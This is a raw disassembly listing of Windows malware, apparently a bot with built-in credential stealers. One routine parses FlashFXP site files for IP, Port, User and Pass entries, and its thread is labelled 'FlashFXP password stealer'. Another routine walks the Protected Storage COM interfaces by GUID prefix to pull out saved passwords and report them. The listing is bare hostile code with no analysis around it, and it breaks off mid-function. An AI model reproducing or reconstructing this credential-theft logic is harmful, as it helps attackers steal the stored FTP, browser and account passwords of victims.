loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset asc_41D3B0 ; "\r\n\r\n["
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset aIp ; "\r\nIP="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset aPort ; "\r\nPort="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset aUser_0 ; "\r\nUser="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset aPass_0 ; "\r\nPass="
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset asc_41D384 ; "[%[^]]]\r\n"
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D318
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D2DC
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call ds:dword_41DF50
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D648
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D614
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D610 ; "%x"
lea eax, [ebp-0A48h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D648
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D648
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
loc_415353: ; DATA XREF: UPX1:off_419100�o
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D648
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call ds:dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DF00
lea eax, [ebp-7FCh]
push eax
call ds:dword_4170FC ; lstrcpy
push offset byte_41DF00
lea eax, [ebp-0DF0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D5C0
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_4155CE
push offset byte_41DF00
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D55C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call ds:dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D54C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D54C
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_4170FC ; lstrcpy
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D54C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D54C
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D54C
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call ds:dword_41703C ; lstrlen
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D50C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D4EC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D4EC
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_417100 ; lstrcpyn
push offset dword_41D4E4
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D4DC
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D494
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DF00
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call ds:dword_4170FC ; lstrcpy
push offset dword_41D54C
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D438
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call ds:dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D3FC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
